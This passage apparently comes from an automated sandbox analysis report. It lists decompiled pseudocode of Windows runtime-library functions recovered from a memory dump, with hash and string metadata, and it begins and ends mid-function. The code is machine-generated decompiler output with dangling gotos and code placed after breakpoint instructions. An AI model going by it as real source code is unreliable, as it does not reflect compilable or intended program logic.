                                                									if(__eflags == 0) {
                                                										_t328 = E016651BE(_t282,  *((intOrPtr*)(_v48 + 0x15c166c)), _a16, _t319, _t328, __eflags, _a20, _a24);
                                                										_v52 = _t328;
                                                										break;
                                                									} else {
                                                										_t246 = _v40;
                                                										goto L62;
                                                									}
                                                									goto L70;
                                                								} else {
                                                									L62:
                                                									_t246 = _t246 - 1;
                                                									continue;
                                                								}
                                                							}
                                                							break;
                                                						}
                                                						_v32 = _t328;
                                                						__eflags = _t328;
                                                						if(_t328 < 0) {
                                                							__eflags = _t328 - 0xc0000100;
                                                							if(_t328 == 0xc0000100) {
                                                								_t291 = _a4;
                                                								__eflags = _t291;
                                                								if(_t291 != 0) {
                                                									_v36 = _t291;
                                                									__eflags =  *_t291 - _t319;
                                                									if( *_t291 == _t319) {
                                                										_t328 = 0xc0000100;
                                                										goto L76;
                                                									} else {
                                                										_t307 =  *((intOrPtr*)(_v44 + 0x30));
                                                										_t248 =  *((intOrPtr*)(_t307 + 0x10));
                                                										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t291;
                                                										if( *((intOrPtr*)(_t248 + 0x48)) == _t291) {
                                                											__eflags =  *(_t307 + 0x1c);
                                                											if( *(_t307 + 0x1c) == 0) {
                                                												L106:
                                                												_t328 = E01612AE4( &_v36, _a8, _t282, _a16, _a20, _a24);
                                                												_v32 = _t328;
                                                												__eflags = _t328 - 0xc0000100;
                                                												if(_t328 != 0xc0000100) {
                                                													goto L69;
                                                												} else {
                                                													_t319 = 1;
                                                													_t291 = _v36;
                                                													goto L75;
                                                												}
                                                											} else {
                                                												_t251 = E015F6600( *(_t307 + 0x1c));
                                                												__eflags = _t251;
                                                												if(_t251 != 0) {
                                                													goto L106;
                                                												} else {
                                                													_t291 = _a4;
                                                													goto L75;
                                                												}
                                                											}
                                                										} else {
                                                											L75:
                                                											_t328 = E01612C50(_t291, _a8, _t282, _a16, _a20, _a24, _t319);
                                                											L76:
                                                											_v32 = _t328;
                                                											goto L69;
                                                										}
                                                									}
                                                									goto L108;
                                                								} else {
                                                									E015FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                									_v8 = 1;
                                                									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                									_t328 = _a24;
                                                									_t258 = E01612AE4( &_v36, _a8, _t282, _a16, _a20, _t328);
                                                									_v32 = _t258;
                                                									__eflags = _t258 - 0xc0000100;
                                                									if(_t258 == 0xc0000100) {
                                                										_v32 = E01612C50(_v36, _a8, _t282, _a16, _a20, _t328, 1);
                                                									}
                                                									_v8 = _t319;
                                                									E01612ACB();
                                                								}
                                                							}
                                                						}
                                                						L69:
                                                						_v8 = 0xfffffffe;
                                                						_t244 = _t328;
                                                					}
                                                					L70:
                                                					return E0163D0D1(_t244);
                                                				}
                                                				L108:
                                                			}

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: PATH
                                                • API String ID: 0-1036084923
                                                • Opcode ID: 268f0c69ece90002a197d61fb56b70cbf1a77f349cfadc421b4ae1054251d782
                                                • Instruction ID: 7cb96f2a3b367e6e352ce561b24e2adb7c4dd83f9a31d286a8fdafabd6231fb4
                                                • Opcode Fuzzy Hash: 268f0c69ece90002a197d61fb56b70cbf1a77f349cfadc421b4ae1054251d782
                                                • Instruction Fuzzy Hash: 93C18F71D002199FDB25DF99DC90ABEBBB5FF48700F28442DE901AB354D734A952CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E0161FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                				char _v5;
                                                				signed int _v8;
                                                				signed int _v12;
                                                				char _v16;
                                                				char _v17;
                                                				char _v20;
                                                				signed int _v24;
                                                				char _v28;
                                                				char _v32;
                                                				signed int _v40;
                                                				void* __ecx;
                                                				void* __edi;
                                                				void* __ebp;
                                                				signed int _t73;
                                                				intOrPtr* _t75;
                                                				signed int _t77;
                                                				signed int _t79;
                                                				signed int _t81;
                                                				intOrPtr _t83;
                                                				intOrPtr _t85;
                                                				intOrPtr _t86;
                                                				signed int _t91;
                                                				signed int _t94;
                                                				signed int _t95;
                                                				signed int _t96;
                                                				signed int _t106;
                                                				signed int _t108;
                                                				signed int _t114;
                                                				signed int _t116;
                                                				signed int _t118;
                                                				signed int _t122;
                                                				signed int _t123;
                                                				void* _t129;
                                                				signed int _t130;
                                                				void* _t132;
                                                				intOrPtr* _t134;
                                                				signed int _t138;
                                                				signed int _t141;
                                                				signed int _t147;
                                                				intOrPtr _t153;
                                                				signed int _t154;
                                                				signed int _t155;
                                                				signed int _t170;
                                                				void* _t174;
                                                				signed int _t176;
                                                				signed int _t177;
                                                
                                                				_t129 = __ebx;
                                                				_push(_t132);
                                                				_push(__esi);
                                                				_t174 = _t132;
                                                				_t73 =  !( *( *(_t174 + 0x18)));
                                                				if(_t73 >= 0) {
                                                					L5:
                                                					return _t73;
                                                				} else {
                                                					E015FEEF0(0x16d7b60);
                                                					_t134 =  *0x16d7b84; // 0x776f7b80
                                                					_t2 = _t174 + 0x24; // 0x24
                                                					_t75 = _t2;
                                                					if( *_t134 != 0x16d7b80) {
                                                						_push(3);
                                                						asm("int 0x29");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						asm("int3");
                                                						_push(0x16d7b60);
                                                						_t170 = _v8;
                                                						_v28 = 0;
                                                						_v40 = 0;
                                                						_v24 = 0;
                                                						_v17 = 0;
                                                						_v32 = 0;
                                                						__eflags = _t170 & 0xffff7cf2;
                                                						if((_t170 & 0xffff7cf2) != 0) {
                                                							L43:
                                                							_t77 = 0xc000000d;
                                                						} else {
                                                							_t79 = _t170 & 0x0000000c;
                                                							__eflags = _t79;
                                                							if(_t79 != 0) {
                                                								__eflags = _t79 - 0xc;
                                                								if(_t79 == 0xc) {
                                                									goto L43;
                                                								} else {
                                                									goto L9;
                                                								}
                                                							} else {
                                                								_t170 = _t170 | 0x00000008;
                                                								__eflags = _t170;
                                                								L9:
                                                								_t81 = _t170 & 0x00000300;
                                                								__eflags = _t81 - 0x300;
                                                								if(_t81 == 0x300) {
                                                									goto L43;
                                                								} else {
                                                									_t138 = _t170 & 0x00000001;
                                                									__eflags = _t138;
                                                									_v24 = _t138;
                                                									if(_t138 != 0) {
                                                										__eflags = _t81;
                                                										if(_t81 != 0) {
                                                											goto L43;
                                                										} else {
                                                											goto L11;
                                                										}
                                                									} else {
                                                										L11:
                                                										_push(_t129);
                                                										_t77 = E015F6D90( &_v20);
                                                										_t130 = _t77;
                                                										__eflags = _t130;
                                                										if(_t130 >= 0) {
                                                											_push(_t174);
                                                											__eflags = _t170 & 0x00000301;
                                                											if((_t170 & 0x00000301) == 0) {
                                                												_t176 = _a8;
                                                												__eflags = _t176;
                                                												if(__eflags == 0) {
                                                													L64:
                                                													_t83 =  *[fs:0x18];
                                                													_t177 = 0;
                                                													__eflags =  *(_t83 + 0xfb8);
                                                													if( *(_t83 + 0xfb8) != 0) {
                                                														E015F76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                													}
                                                													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                													goto L15;
                                                												} else {
                                                													asm("sbb edx, edx");
                                                													_t114 = E01688938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                													__eflags = _t114;
                                                													if(_t114 < 0) {
                                                														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                														E015EB150();
                                                													}
                                                													_t116 = E01686D81(_t176,  &_v16);
                                                													__eflags = _t116;
                                                													if(_t116 >= 0) {
                                                														__eflags = _v16 - 2;
                                                														if(_v16 < 2) {
                                                															L56:
                                                															_t118 = E015F75CE(_v20, 5, 0);
                                                															__eflags = _t118;
                                                															if(_t118 < 0) {
                                                																L67:
                                                																_t130 = 0xc0000017;
                                                																goto L32;
                                                															} else {
                                                																__eflags = _v12;
                                                																if(_v12 == 0) {
                                                																	goto L67;
                                                																} else {
                                                																	_t153 =  *0x16d8638; // 0x0
                                                																	_t122 = L015F38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                																	_t154 = _v12;
                                                																	_t130 = _t122;
                                                																	__eflags = _t130;
                                                																	if(_t130 >= 0) {
                                                																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                																		__eflags = _t123;
                                                																		if(_t123 != 0) {
                                                																			_t155 = _a12;
                                                																			__eflags = _t155;
                                                																			if(_t155 != 0) {
                                                																				 *_t155 = _t123;
                                                																			}
                                                																			goto L64;
                                                																		} else {
                                                																			E015F76E2(_t154);
                                                																			goto L41;
                                                																		}
                                                																	} else {
                                                																		E015F76E2(_t154);
                                                																		_t177 = 0;
                                                																		goto L18;
                                                																	}
                                                																}
                                                															}
                                                														} else {
                                                															__eflags =  *_t176;
                                                															if( *_t176 != 0) {
                                                																goto L56;
                                                															} else {
                                                																__eflags =  *(_t176 + 2);
                                                																if( *(_t176 + 2) == 0) {
                                                																	goto L64;
                                                																} else {
                                                																	goto L56;
                                                																}
                                                															}
                                                														}
                                                													} else {
                                                														_t130 = 0xc000000d;
                                                														goto L32;
                                                													}
                                                												}
                                                												goto L35;
                                                											} else {
                                                												__eflags = _a8;
                                                												if(_a8 != 0) {
                                                													_t77 = 0xc000000d;
                                                												} else {
                                                													_v5 = 1;
                                                													L0161FCE3(_v20, _t170);
                                                													_t177 = 0;
                                                													__eflags = 0;
                                                													L15:
                                                													_t85 =  *[fs:0x18];
                                                													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                														L18:
                                                														__eflags = _t130;
                                                														if(_t130 != 0) {
                                                															goto L32;
                                                														} else {
                                                															__eflags = _v5 - _t130;
                                                															if(_v5 == _t130) {
                                                																goto L32;
                                                															} else {
                                                																_t86 =  *[fs:0x18];
                                                																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                																}
                                                																__eflags = _t177;
                                                																if(_t177 == 0) {
                                                																	L31:
                                                																	__eflags = 0;
                                                																	L015F70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                																	goto L32;
                                                																} else {
                                                																	__eflags = _v24;
                                                																	_t91 =  *(_t177 + 0x20);
                                                																	if(_v24 != 0) {
                                                																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                																		goto L31;
                                                																	} else {
                                                																		_t141 = _t91 & 0x00000040;
                                                																		__eflags = _t170 & 0x00000100;
                                                																		if((_t170 & 0x00000100) == 0) {
                                                																			__eflags = _t141;
                                                																			if(_t141 == 0) {
                                                																				L74:
                                                																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                																				goto L27;
                                                																			} else {
                                                																				_t177 = E0161FD22(_t177);
                                                																				__eflags = _t177;
                                                																				if(_t177 == 0) {
                                                																					goto L42;
                                                																				} else {
                                                																					_t130 = E0161FD9B(_t177, 0, 4);
                                                																					__eflags = _t130;
                                                																					if(_t130 != 0) {
                                                																						goto L42;
                                                																					} else {
                                                																						_t68 = _t177 + 0x20;
                                                																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                																						__eflags =  *_t68;
                                                																						_t91 =  *(_t177 + 0x20);
                                                																						goto L74;
                                                																					}
                                                																				}
                                                																			}
                                                																			goto L35;
                                                																		} else {
                                                																			__eflags = _t141;
                                                																			if(_t141 != 0) {
                                                																				_t177 = E0161FD22(_t177);
                                                																				__eflags = _t177;
                                                																				if(_t177 == 0) {
                                                																					L42:
                                                																					_t77 = 0xc0000001;
                                                																					goto L33;
                                                																				} else {
                                                																					_t130 = E0161FD9B(_t177, 0, 4);
                                                																					__eflags = _t130;
                                                																					if(_t130 != 0) {
                                                																						goto L42;
                                                																					} else {
                                                																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                																						_t91 =  *(_t177 + 0x20);
                                                																						goto L26;
                                                																					}
                                                																				}
                                                																				goto L35;
                                                																			} else {
                                                																				L26:
                                                																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                																				__eflags = _t94;
                                                																				L27:
                                                																				 *(_t177 + 0x20) = _t94;
                                                																				__eflags = _t170 & 0x00008000;
                                                																				if((_t170 & 0x00008000) != 0) {
                                                																					_t95 = _a12;
                                                																					__eflags = _t95;
                                                																					if(_t95 != 0) {
                                                																						_t96 =  *_t95;
                                                																						__eflags = _t96;
                                                																						if(_t96 != 0) {
                                                																							 *((short*)(_t177 + 0x22)) = 0;
                                                																							_t40 = _t177 + 0x20;
                                                																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                																							__eflags =  *_t40;
                                                																						}
                                                																					}
                                                																				}
                                                																				goto L31;
                                                																			}
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													} else {
                                                														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                														_t106 =  *(_t147 + 0x20);
                                                														__eflags = _t106 & 0x00000040;
                                                														if((_t106 & 0x00000040) != 0) {
                                                															_t147 = E0161FD22(_t147);
                                                															__eflags = _t147;
                                                															if(_t147 == 0) {
                                                																L41:
                                                																_t130 = 0xc0000001;
                                                																L32:
                                                																_t77 = _t130;
                                                																goto L33;
                                                															} else {
                                                																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                																_t106 =  *(_t147 + 0x20);
                                                																goto L17;
                                                															}
                                                															goto L35;
                                                														} else {
                                                															L17:
                                                															_t108 = _t106 | 0x00000080;
                                                															__eflags = _t108;
                                                															 *(_t147 + 0x20) = _t108;
                                                															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                															goto L18;
                                                														}
                                                													}
                                                												}
                                                											}
                                                											L33:
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                						L35:
                                                						return _t77;
                                                					} else {
                                                						 *_t75 = 0x16d7b80;
                                                						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                						 *_t134 = _t75;
                                                						 *0x16d7b84 = _t75;
                                                						_t73 = E015FEB70(_t134, 0x16d7b60);
                                                						if( *0x16d7b20 != 0) {
                                                							_t73 =  *( *[fs:0x30] + 0xc);
                                                							if( *((char*)(_t73 + 0x28)) == 0) {
                                                								_t73 = E015FFF60( *0x16d7b20);
                                                							}
                                                						}
                                                						goto L5;
                                                					}
                                                				}
                                                			}


                                                Strings
                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0165BE0F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                • API String ID: 0-865735534
                                                • Opcode ID: 101e6d4ba857f62d766fb2a43c8c05786a6db9eca8f4d48eab8ad3900a21a43e
                                                • Instruction ID: a35b7ff78487b38894f26682db896509716a6c8bb304a41c2eaffe54c33737e7
                                                • Opcode Fuzzy Hash: 101e6d4ba857f62d766fb2a43c8c05786a6db9eca8f4d48eab8ad3900a21a43e
                                                • Instruction Fuzzy Hash: 59A11672B006068BEB25DF68CC5077AB7A6BF48710F0845ADDE46DB795DB30D845DB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 63%
                                                			E015E2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                				signed char _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				signed int _v52;
                                                				void* __esi;
                                                				void* __ebp;
                                                				intOrPtr _t55;
                                                				signed int _t57;
                                                				signed int _t58;
                                                				char* _t62;
                                                				signed char* _t63;
                                                				signed char* _t64;
                                                				signed int _t67;
                                                				signed int _t72;
                                                				signed int _t77;
                                                				signed int _t78;
                                                				signed int _t88;
                                                				intOrPtr _t89;
                                                				signed char _t93;
                                                				signed int _t97;
                                                				signed int _t98;
                                                				signed int _t102;
                                                				signed int _t103;
                                                				intOrPtr _t104;
                                                				signed int _t105;
                                                				signed int _t106;
                                                				signed char _t109;
                                                				signed int _t111;
                                                				void* _t116;
                                                
                                                				_t102 = __edi;
                                                				_t97 = __edx;
                                                				_v12 = _v12 & 0x00000000;
                                                				_t55 =  *[fs:0x18];
                                                				_t109 = __ecx;
                                                				_v8 = __edx;
                                                				_t86 = 0;
                                                				_v32 = _t55;
                                                				_v24 = 0;
                                                				_push(__edi);
                                                				if(__ecx == 0x16d5350) {
                                                					_t86 = 1;
                                                					_v24 = 1;
                                                					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                				}
                                                				_t103 = _t102 | 0xffffffff;
                                                				if( *0x16d7bc8 != 0) {
                                                					_push(0xc000004b);
                                                					_push(_t103);
                                                					E016297C0();
                                                				}
                                                				if( *0x16d79c4 != 0) {
                                                					_t57 = 0;
                                                				} else {
                                                					_t57 = 0x16d79c8;
                                                				}
                                                				_v16 = _t57;
                                                				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                					_t93 = _t109;
                                                					L23();
                                                				}
                                                				_t58 =  *_t109;
                                                				if(_t58 == _t103) {
                                                					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                					_t58 = _t103;
                                                					if(__eflags == 0) {
                                                						_t93 = _t109;
                                                						E01611624(_t86, __eflags);
                                                						_t58 =  *_t109;
                                                					}
                                                				}
                                                				_v20 = _v20 & 0x00000000;
                                                				if(_t58 != _t103) {
                                                					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                				}
                                                				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                				_t88 = _v16;
                                                				_v28 = _t104;
                                                				L9:
                                                				while(1) {
                                                					if(E01607D50() != 0) {
                                                						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                					} else {
                                                						_t62 = 0x7ffe0382;
                                                					}
                                                					if( *_t62 != 0) {
                                                						_t63 =  *[fs:0x30];
                                                						__eflags = _t63[0x240] & 0x00000002;
                                                						if((_t63[0x240] & 0x00000002) != 0) {
                                                							_t93 = _t109;
                                                							E0167FE87(_t93);
                                                						}
                                                					}
                                                					if(_t104 != 0xffffffff) {
                                                						_push(_t88);
                                                						_push(0);
                                                						_push(_t104);
                                                						_t64 = E01629520();
                                                						goto L15;
                                                					} else {
                                                						while(1) {
                                                							_t97 =  &_v8;
                                                							_t64 = E0161E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                							if(_t64 == 0x102) {
                                                								break;
                                                							}
                                                							_t93 =  *(_t109 + 4);
                                                							_v8 = _t93;
                                                							if((_t93 & 0x00000002) != 0) {
                                                								continue;
                                                							}
                                                							L15:
                                                							if(_t64 == 0x102) {
                                                								break;
                                                							}
                                                							_t89 = _v24;
                                                							if(_t64 < 0) {
                                                								L0163DF30(_t93, _t97, _t64);
                                                								_push(_t93);
                                                								_t98 = _t97 | 0xffffffff;
                                                								__eflags =  *0x16d6901;
                                                								_push(_t109);
                                                								_v52 = _t98;
                                                								if( *0x16d6901 != 0) {
                                                									_push(0);
                                                									_push(1);
                                                									_push(0);
                                                									_push(0x100003);
                                                									_push( &_v12);
                                                									_t72 = E01629980();
                                                									__eflags = _t72;
                                                									if(_t72 < 0) {
                                                										_v12 = _t98 | 0xffffffff;
                                                									}
                                                								}
                                                								asm("lock cmpxchg [ecx], edx");
                                                								_t111 = 0;
                                                								__eflags = 0;
                                                								if(0 != 0) {
                                                									__eflags = _v12 - 0xffffffff;
                                                									if(_v12 != 0xffffffff) {
                                                										_push(_v12);
                                                										E016295D0();
                                                									}
                                                								} else {
                                                									_t111 = _v12;
                                                								}
                                                								return _t111;
                                                							} else {
                                                								if(_t89 != 0) {
                                                									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                									_t77 = E01607D50();
                                                									__eflags = _t77;
                                                									if(_t77 == 0) {
                                                										_t64 = 0x7ffe0384;
                                                									} else {
                                                										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                									}
                                                									__eflags =  *_t64;
                                                									if( *_t64 != 0) {
                                                										_t64 =  *[fs:0x30];
                                                										__eflags = _t64[0x240] & 0x00000004;
                                                										if((_t64[0x240] & 0x00000004) != 0) {
                                                											_t78 = E01607D50();
                                                											__eflags = _t78;
                                                											if(_t78 == 0) {
                                                												_t64 = 0x7ffe0385;
                                                											} else {
                                                												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                											}
                                                											__eflags =  *_t64 & 0x00000020;
                                                											if(( *_t64 & 0x00000020) != 0) {
                                                												_t64 = E01667016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                											}
                                                										}
                                                									}
                                                								}
                                                								return _t64;
                                                							}
                                                						}
                                                						_t97 = _t88;
                                                						_t93 = _t109;
                                                						E0167FDDA(_t97, _v12);
                                                						_t105 =  *_t109;
                                                						_t67 = _v12 + 1;
                                                						_v12 = _t67;
                                                						__eflags = _t105 - 0xffffffff;
                                                						if(_t105 == 0xffffffff) {
                                                							_t106 = 0;
                                                							__eflags = 0;
                                                						} else {
                                                							_t106 =  *(_t105 + 0x14);
                                                						}
                                                						__eflags = _t67 - 2;
                                                						if(_t67 > 2) {
                                                							__eflags = _t109 - 0x16d5350;
                                                							if(_t109 != 0x16d5350) {
                                                								__eflags = _t106 - _v20;
                                                								if(__eflags == 0) {
                                                									_t93 = _t109;
                                                									E0167FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                								}
                                                							}
                                                						}
                                                						_push("RTL: Re-Waiting\n");
                                                						_push(0);
                                                						_push(0x65);
                                                						_v20 = _t106;
                                                						E01675720();
                                                						_t104 = _v28;
                                                						_t116 = _t116 + 0xc;
                                                						continue;
                                                					}
                                                				}
                                                			}





































                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Re-Waiting
                                                • API String ID: 0-316354757
                                                • Opcode ID: f351eed3f90181efed95e0742da348f22203a9c9a2ec76e650792b44d4f0a425
                                                • Instruction ID: 83991a299a6e9fd45020d498acd0a919a80d6423b66a3157e06c1359ba56d139
                                                • Opcode Fuzzy Hash: f351eed3f90181efed95e0742da348f22203a9c9a2ec76e650792b44d4f0a425
                                                • Instruction Fuzzy Hash: D3610031E00615EFEB26DB6CCC44B7E7BE9FB84714F1406A9E9119B3C5C77499028792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E016B0EA5(void* __ecx, void* __edx) {
                                                				signed int _v20;
                                                				char _v24;
                                                				intOrPtr _v28;
                                                				unsigned int _v32;
                                                				signed int _v36;
                                                				intOrPtr _v40;
                                                				char _v44;
                                                				intOrPtr _v64;
                                                				void* __ebx;
                                                				void* __edi;
                                                				signed int _t58;
                                                				unsigned int _t60;
                                                				intOrPtr _t62;
                                                				char* _t67;
                                                				char* _t69;
                                                				void* _t80;
                                                				void* _t83;
                                                				intOrPtr _t93;
                                                				intOrPtr _t115;
                                                				char _t117;
                                                				void* _t120;
                                                
                                                				_t83 = __edx;
                                                				_t117 = 0;
                                                				_t120 = __ecx;
                                                				_v44 = 0;
                                                				if(E016AFF69(__ecx,  &_v44,  &_v32) < 0) {
                                                					L24:
                                                					_t109 = _v44;
                                                					if(_v44 != 0) {
                                                						E016B1074(_t83, _t120, _t109, _t117, _t117);
                                                					}
                                                					L26:
                                                					return _t117;
                                                				}
                                                				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                				_t5 = _t83 + 1; // 0x1
                                                				_v36 = _t5 << 0xc;
                                                				_v40 = _t93;
                                                				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                				asm("sbb ebx, ebx");
                                                				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                				if(_t58 != 0) {
                                                					_push(0);
                                                					_push(0x14);
                                                					_push( &_v24);
                                                					_push(3);
                                                					_push(_t93);
                                                					_push(0xffffffff);
                                                					_t80 = E01629730();
                                                					_t115 = _v64;
                                                					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                						_push(_t93);
                                                						E016AA80D(_t115, 1, _v20, _t117);
                                                						_t83 = 4;
                                                					}
                                                				}
                                                				if(E016AA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                					goto L24;
                                                				}
                                                				_t60 = _v32;
                                                				_t97 = (_t60 != 0x100000) + 1;
                                                				_t83 = (_v44 -  *0x16d8b04 >> 0x14) + (_v44 -  *0x16d8b04 >> 0x14);
                                                				_v28 = (_t60 != 0x100000) + 1;
                                                				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                				_v40 = _t62;
                                                				if(_t83 >= _t62) {
                                                					L10:
                                                					asm("lock xadd [eax], ecx");
                                                					asm("lock xadd [eax], ecx");
                                                					if(E01607D50() == 0) {
                                                						_t67 = 0x7ffe0380;
                                                					} else {
                                                						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                					}
                                                					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                						E016A138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                					}
                                                					if(E01607D50() == 0) {
                                                						_t69 = 0x7ffe0388;
                                                					} else {
                                                						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                					}
                                                					if( *_t69 != 0) {
                                                						E0169FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                					}
                                                					if(( *0x16d8724 & 0x00000008) != 0) {
                                                						E016A52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                					}
                                                					_t117 = _v44;
                                                					goto L26;
                                                				}
                                                				while(E016B15B5(0x16d8ae4, _t83, _t97, _t97) >= 0) {
                                                					_t97 = _v28;
                                                					_t83 = _t83 + 2;
                                                					if(_t83 < _v40) {
                                                						continue;
                                                					}
                                                					goto L10;
                                                				}
                                                				goto L24;
                                                			}

























                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `
                                                • API String ID: 0-2679148245
                                                • Opcode ID: 8f4861b8235d977ab53e33b9fe60d8abed38eed931a2995860d735c7e84a18e0
                                                • Instruction ID: aba5ef75ee6f0a4781a7352fe72c089b40463a16ea87a62f6fa2de51cfef00ba
                                                • Opcode Fuzzy Hash: 8f4861b8235d977ab53e33b9fe60d8abed38eed931a2995860d735c7e84a18e0
                                                • Instruction Fuzzy Hash: EF518D713043429BD325DF28DCD4B5BBBEAEB85704F04092DFA9697290DB70E885CB66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E0161F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				char* _v20;
                                                				intOrPtr _v24;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				char _v36;
                                                				char _v44;
                                                				char _v52;
                                                				intOrPtr _v56;
                                                				char _v60;
                                                				intOrPtr _v72;
                                                				void* _t51;
                                                				void* _t58;
                                                				signed short _t82;
                                                				short _t84;
                                                				signed int _t91;
                                                				signed int _t100;
                                                				signed short* _t103;
                                                				void* _t108;
                                                				intOrPtr* _t109;
                                                
                                                				_t103 = __ecx;
                                                				_t82 = __edx;
                                                				_t51 = E01604120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                				if(_t51 >= 0) {
                                                					_push(0x21);
                                                					_push(3);
                                                					_v56 =  *0x7ffe02dc;
                                                					_v20 =  &_v52;
                                                					_push( &_v44);
                                                					_v28 = 0x18;
                                                					_push( &_v28);
                                                					_push(0x100020);
                                                					_v24 = 0;
                                                					_push( &_v60);
                                                					_v16 = 0x40;
                                                					_v12 = 0;
                                                					_v8 = 0;
                                                					_t58 = E01629830();
                                                					_t87 =  *[fs:0x30];
                                                					_t108 = _t58;
                                                					L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                					if(_t108 < 0) {
                                                						L11:
                                                						_t51 = _t108;
                                                					} else {
                                                						_push(4);
                                                						_push(8);
                                                						_push( &_v36);
                                                						_push( &_v44);
                                                						_push(_v60);
                                                						_t108 = E01629990();
                                                						if(_t108 < 0) {
                                                							L10:
